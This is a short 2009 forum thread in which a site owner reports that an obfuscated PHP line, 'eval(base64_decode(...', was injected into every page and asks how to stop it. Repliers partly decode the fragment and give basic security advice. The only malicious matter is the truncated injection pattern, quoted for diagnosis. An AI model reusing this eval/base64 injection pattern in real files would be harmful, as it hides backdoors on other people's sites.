View Full Version : php decode hacked my site

10-20-2009, 08:51 AM
i found a problem on my site and when i compare the files on the server with my local files i found that every page (*.js or *.php) has this line on it
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a javascript line

so i knew that my site has been hacked..
1 - i want to know how to prevent anyone to hack my site?
i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST['name'])

is this true? and can it help me?

2- how did anyone hack my site??

3- how i can know what does this code mean???

thanks in advance and have a nice day

10-20-2009, 10:03 AM
Are you using any opensource engine anywhere under your ftp account?

Phil Jackson
10-20-2009, 10:03 AM
post the rest of the line "(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC "
above translates to "if(function_exists("

10-20-2009, 05:02 PM
Is your password a regular word that can be found in a dictionary? You really must use numbers and characters in your password.